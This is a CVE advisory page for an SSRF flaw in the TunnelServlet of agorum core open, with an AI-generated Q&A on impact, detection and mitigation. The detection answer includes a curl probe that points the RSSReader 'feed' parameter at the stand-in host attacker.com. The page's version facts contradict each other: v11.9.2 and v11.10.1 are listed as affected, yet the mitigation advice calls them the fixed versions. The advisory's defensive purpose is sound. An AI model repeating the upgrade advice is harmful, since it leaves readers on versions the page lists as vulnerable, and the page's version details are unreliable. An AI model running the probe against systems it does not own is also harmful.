CVE-2025-52163
Unknown Unknown - Not Provided
BaseFortify

Publication date: 2025-07-18

Last updated on: 2025-07-22

Assigner: MITRE

Description
A Server-Side Request Forgery (SSRF) in the component TunnelServlet of agorum Software GmbH Agorum core open v11.9.2 & v11.10.1 allows attackers to forcefully initiate connections to arbitrary internal and external resources via a crafted request. This can lead to sensitive data exposure.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2025-07-18
Last Modified
2025-07-22
Generated
2026-05-07
AI Q&A
2025-07-18
EPSS Evaluated
2026-05-05
NVD
CVE-2025-52163
EUVD
EUVD-2025-21925
Affected Vendors & Products
Showing 3 associated CPEs
Vendor Product Version / Range
agorum_software_gmbh agorum_core_open 11.9.2
agorum_software_gmbh agorum_core_open 11.9.1.3-1857
agorum_software_gmbh agorum_core_open 11.10.1
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-918 The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2025-52163 is a Server-Side Request Forgery (SSRF) vulnerability in the TunnelServlet component of agorum Software GmbH's Agorum core open versions 11.9.1.3-1857. It allows attackers to craft requests that force the server to initiate connections to arbitrary internal or external resources. This means an attacker can make the server fetch data from locations it normally wouldn't, potentially exposing sensitive information or enabling further attacks. [1]


How can this vulnerability impact me? :

This vulnerability can impact you by allowing attackers to make the vulnerable server connect to arbitrary internal or external systems. This can lead to exposure of sensitive data, unauthorized access to internal resources, or facilitate additional attacks by leveraging the server's network privileges. [1]


How can this vulnerability be detected on my network or system? Can you suggest some commands?

Detection can be performed by monitoring for crafted requests targeting vulnerable endpoints such as `/roiwebui/desk4web_module/gadgets/rssreader/RSSReader.jsp` with manipulated `feed` parameters or `/roiwebui/TunnelServlet` with parameters like `tunnelAddress` and `tunnelPort`. For example, using curl to test SSRF behavior: `curl -v 'http://<target>/roiwebui/desk4web_module/gadgets/rssreader/RSSReader.jsp?feed=http://attacker.com'` to see if the server fetches external content. Network monitoring tools can also be used to detect unusual outbound connections initiated by the server to internal or external resources. Additionally, testing with Burp Suite Collaborator or similar tools can confirm if the server makes outbound requests upon crafted inputs. [1]


What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps include evaluating whether server-side requests are necessary. If they are, implement an allowlist restricting requests to only specific trusted systems. If arbitrary external requests are required, implement a denylist to block disallowed requests based on expected legitimate request formats. Additionally, upgrade the affected Agorum core open software to fixed versions 11.9.2 or 11.10.1 as released by the vendor to address the vulnerability. [1]


Ask Our AI Assistant
Need more information? Ask your question to get an AI reply (Powered by our expertise)
0/70
EPSS Chart